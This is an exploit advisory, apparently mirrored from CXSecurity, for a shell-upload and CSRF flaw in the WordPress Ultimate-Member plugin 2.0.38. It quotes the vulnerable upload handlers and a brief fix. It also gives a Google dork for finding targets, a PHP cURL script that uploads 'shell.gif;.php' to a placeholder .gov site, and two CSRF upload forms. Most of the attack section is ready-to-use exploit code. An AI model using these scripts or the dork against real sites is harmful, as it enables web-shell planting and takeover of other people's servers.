WordPress Ultimate-Member Plugins 2.0.38 CSRF Backdoor Access - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1470608 漏洞类型
发布时间 2019-02-04 更新时间 2019-02-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019020043
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
####################################################################

# Exploit Title : WordPress Ultimate-Member Plugins 2.0.38 CSRF Backdoor Access
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/02/2019
# Vendor Homepage : ultimatemember.com
# Software Download Link : downloads.wordpress.org/plugin/ultimate-member.2.0.38.zip
# Software Information Links : wordpress.org/plugins/ultimate-member/
# Software Vulnerable Source Codes :
github.com/wp-plugins/ultimate-member/blob/master/core/lib/upload/um-file-upload.php
github.com/wp-plugins/ultimate-member/blob/master/core/lib/upload/um-image-upload.php
# Software Version : 1.3.21 and 2.0.38 - other previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/ultimate-member/''
# Vulnerability Type : CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

WordPress Ultimate-Member Plugins 2.0.38 CSRF Shell Upload Backdoor Access Vulnerability

####################################################################

# Description about Software :
***************************
Ultimate Member is the #1 user profile & membership plugin for WordPress. 

The plugin makes it a breeze for users to sign-up and become members of your website. 

The plugin allows you to add beautiful user profiles to your site and is perfect

for creating advanced online communities and membership sites.

Lightweight and highly extendible, Ultimate Member will enable you to create almost 

any type of site where users can join and become members with absolute ease.

####################################################################

# Impact :
***********

* The software allows the attacker to upload or transfer files of dangerous types 

that can be automatically processed within the product's environment.

* This software WordPress Ultimate-Member Plugins  is prone to a vulnerability 

that lets attackers upload arbitrary files and shell because it fails to adequately sanitize user-supplied input. 

An attacker can exploit this vulnerability to upload arbitrary code and execute 

it in the context of the webserver process. 

This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Attackers can exploit this issue through a browser. 

System Compromise - Remote attackers can gain control of vulnerable systems.

####################################################################

# Remote File Upload/Shell Upload Exploit :
***************************************
/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php

# Directory File Path :
*******************

/wp-content/uploads/ultimatemember/temp/.....

/wp-content/uploads/.....

####################################################################

# Vulnerability Error :
******************* 
{"error":"A theme or plugin compatibility issue"}

# Vulnerable Source Code => [ um-image-upload.php ]
************************
<?php
$i = 0;
$dirname = dirname( __FILE__ );
do {
	$dirname = dirname( $dirname );
	$wp_load = "{$dirname}/wp-load.php";
}
while( ++$i < 10 && !file_exists( $wp_load ) );
require_once( $wp_load );
global $ultimatemember;
$id = $_POST['key'];
$ultimatemember->fields->set_id = $_POST['set_id'];
$ultimatemember->fields->set_mode = $_POST['set_mode'];
$ret['error'] = null;
$ret = array();
if(isset($_FILES[$id]['name'])) {
    if(!is_array($_FILES[$id]['name'])) {
	
		$temp = $_FILES[$id]["tmp_name"];
		$file = $_FILES[$id]["name"];
		$file = sanitize_file_name($file);
		
		$error = $ultimatemember->files->check_image_upload( $temp, $id );
		if ( $error ){
			
			$ret['error'] = $error;
		
		} else {
			
			$ret[] = $ultimatemember->files->new_image_upload_temp( $temp, $file, um_get_option('image_compression') );
			
		}
    }
	
} else {
	$ret['error'] = __('A theme or plugin compatibility issue','ultimatemember');
}
echo json_encode($ret);

####################################################################

# Vulnerable Source Code => [ um-file-upload.php ]
***************************

<?php
$i = 0;
$dirname = dirname( __FILE__ );
do {
	$dirname = dirname( $dirname );
	$wp_load = "{$dirname}/wp-load.php";
}
while( ++$i < 10 && !file_exists( $wp_load ) );
require_once( $wp_load );
global $ultimatemember;
$id = $_POST['key'];
$ultimatemember->fields->set_id = $_POST['set_id'];
$ultimatemember->fields->set_mode = $_POST['set_mode'];
$ret['error'] = null;
$ret = array();
if(isset($_FILES[$id]['name'])) {
    if(!is_array($_FILES[$id]['name'])) {
	
		$temp = $_FILES[$id]["tmp_name"];
		$file = $_FILES[$id]["name"];
		$file = sanitize_file_name($file);
		$extension = pathinfo($file, PATHINFO_EXTENSION);
		
		$error = $ultimatemember->files->check_file_upload( $temp, $extension, $id );
		if ( $error ){
			$ret['error'] = $error;
		} else {
			$ret[] = $ultimatemember->files->new_file_upload_temp( $temp, $file );
			$ret['icon'] = $ultimatemember->files->get_fonticon_by_ext( $extension );
			$ret['icon_bg'] = $ultimatemember->files->get_fonticon_bg_by_ext( $extension );
			$ret['filename'] = $file;
		}
    }
	
} else {
	$ret['error'] = __('A theme or plugin compatibility issue','ultimatemember');
}
echo json_encode($ret);

####################################################################

# Solution :
******************

Temporary solution to this is to disable the image upload functionality, 

which can be done by adding the following lines

$ret['error'] = __('Functionality disabled');
exit(json_encode($ret));

directly below the line

function ajax_image_upload() {

in the file /includes/core/class-files.php

####################################################################

# PHP Exploiter => 
********************

<?php

$uploadfile="shell.gif;.php";

$ch = curl_init("http://VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

              array('Filedata'=>"@$uploadfile",'folder'=>'/wp-content/uploads/ultimatemember/temp/'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?>

####################################################################

# CSRF Cross Site Request Forgery Exploiter 1 :
******************************************

<form enctype="multipart/form-data"
action="http://VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="hidden" name="dir_icons" value="../../../../">
<input type="submit" value="upload" />
</form>

####################################################################

# CSRF Cross Site Request Forgery Exploiter 2 :
******************************************

<html>
<body>
<form enctype="multipart/form-data" action="VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-file-upload.php" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="Successfull!" />
</form>
</body>
</html>

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################